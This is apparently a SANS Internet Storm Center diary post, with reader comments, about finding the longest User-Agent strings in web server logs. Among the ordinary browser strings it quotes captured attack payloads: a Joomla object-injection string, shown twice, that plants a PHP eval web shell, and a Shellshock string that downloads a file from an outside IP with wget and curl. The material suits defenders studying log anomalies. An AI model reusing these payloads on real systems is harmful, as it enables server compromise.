Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: What is your most unusual User-Agent? - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
What is your most unusual User-Agent?

When looking at my web logs, I am always out to hunt for anomalies. Today, after seeing some odd and long user agents, I figured it would be fun to look for the longest once that I can find in my logs. First of all: how?

Fist, I am extracting the User Agent string from my web server access log:

cut -f 6 -d'"' access_log > /tmp/useragents 
 (this may look different for you if you use a different log format)

Next, sorting the result by line length:

cat /tmp/useragents | awk '{ print length, $0 }' | sort -n -s | cut -d" " -f2- | uniq

So finally some of the "winners"

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 OWASMIME/4.0500 (...) 
 OWASMIME/4.0500 is repeated many times.  No idea what this is about. A buggy script?
}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;
O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;
a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;
O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;
s:254:\x22file_put_contents($_SERVER[\x22DOCUMENT_ROOT\x22].chr(47).\x22images\x22.
chr(47).\x22main.php\x22,\x22|=|\x5Cx3C\x22.chr(63).\x22php \x5Cx24mujj=\x5Cx24_POST['@123'];if(\x5Cx24mujj!='')
{\x5Cx24xsser=base64_decode(\x5Cx24_POST['z0']);
@eval(\x5C\x22\x5C\x5C\x5Cx24safedg=\x5Cx24xsser;\x5C\x22);}\x22);
JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;
s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;
O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}~\xD9

An exploit for an OLD Joomla issue if I remember right? This stuff still works?

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; 
.NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0;
 GWX:MANAGED; GWX:DOWNLOADED; GWX:QUALIFIED; InfoPath.3; MALCJS; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; ms-office; MSOffice 15)

Again. Lots of duplicate content. Do you REALLY have to tell me what version of Outlook you are running? I know you are proud of your tablet...

Oddly enough, no shell shock today. 

What is your longest User-Agent if you search your weblogs?

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

I will be teaching next: Defending Web Applications Security Essentials - SANS Security West 2019

Johannes

3482 Posts
ISC Handler
Shortest user agent:
-

Longest user agent:
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
geeknik

7 Posts
Longest user-agent year-to-date was this one, from back in January:

()+{+:;};/usr/bin/perl+-e+'print+"Content-Type:+text/plain\r\n\r\nXSUCCESS!";system("+wget+http://204.232.209.188/images/freshcafe/slice_30_192.png+;+curl+-O+http://204.232.209.188/images/freshcafe/slice_30_192.png+;+fetch+http://204.232.209.188/images/freshcafe/slice_30_192.png+;+lwp-download++http://204.232.209.188/images/freshcafe/slice_30_192.png+;+GET+http://204.232.209.188/images/freshcafe/slice_30_192.png+;+lynx+http://204.232.209.188/images/freshcafe/slice_30_192.png++");'

Longest one this month is someone who's very proud of their tablet:

Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+Trident/7.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+MDDR;+InfoPath.2;+.NET4.0C;+.NET4.0E;+MS-RTC+LM+8;+Tablet+PC+2.0;+GWX:MANAGED;+GWX:QUALIFIED;+Microsoft+Outlook+14.0.7169;+ms-office;+MSOffice+14)
Anonymous
Longest:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0; McAfee; InfoPath.3; GWX:DOWNLOADED; GWX:RESERVED; GWX:QUALIFIED; ms-office; MSOffice

or

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.9) Gecko/20100101 Goanna/2.0 Firefox/38.9 PaleMoon/26.2.2Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.9) Gecko/20100101 Goanna/2.0 Firefox/38.9 PaleMoon/26.2.2Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.9) Gecko/201001
J

2 Posts
It was tempting to play... Tx Mr Splunk :-)

426 chars:

Mozilla/5.0 (Linux; U; Android 6.0; zh-cn; Doov L5P_64_M Build/MRA58K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/1.0.0.100 U3/0.8.0 Mobile Safari/534.30 Tanggula/0.1.0 WebLight/1.4.5Mozilla/5.0 (Linux; U; Android 6.0; zh-cn; Doov L5P_64_M Build/MRA58K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/1.0.0.100 U3/0.8.0 Mobile Safari/534.30 Tanggula/0.1.0 WebLight/1.4.5 xiaoyun_AppSearch/2.1.5
Xme

448 Posts
ISC Handler
FWIW, I've been seeing the Joomla MySQLi attempts on my Snort IPS recently too.

Agents... lots of Mobile crawlers, etc:

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.179[128]; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)

Mozilla/5.0 CommonCrawler Node MFEM74FEY7ZZZMQ7DWUZYSIZMHWMR73C7XMMOCFILOY4ZSCAEWCZBJGMOFT6EHU.MHXEUGHG6.RFYCW6TUULJSQE7PNQXZBMOMZAVVIKEMOSWSC6FGBNQTWGNX.cdn0.common.crawl.zone

Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)

Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)

Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

Mozilla/5.0 (compatible; SurdotlyBot/1.0; +http://sur.ly/bot.html; Linux; Android 4; iPhone; CPU iPhone OS 6_0_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A523 Safari/8536.25
Anonymous
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:237:"file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."sets.php","|=|\x3C".chr(63)."php \x24mujj=\x24_POST['hole'];if(\x24mujj!=''){\x24xsser=base64_decode(\x24_POST['z0']);@eval(\"\\\x24safedg=\x24xsser;\");}");JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}~�
Krypt0ni8

21 Posts

Sign Up for Free or Log In to start participating in the conversation!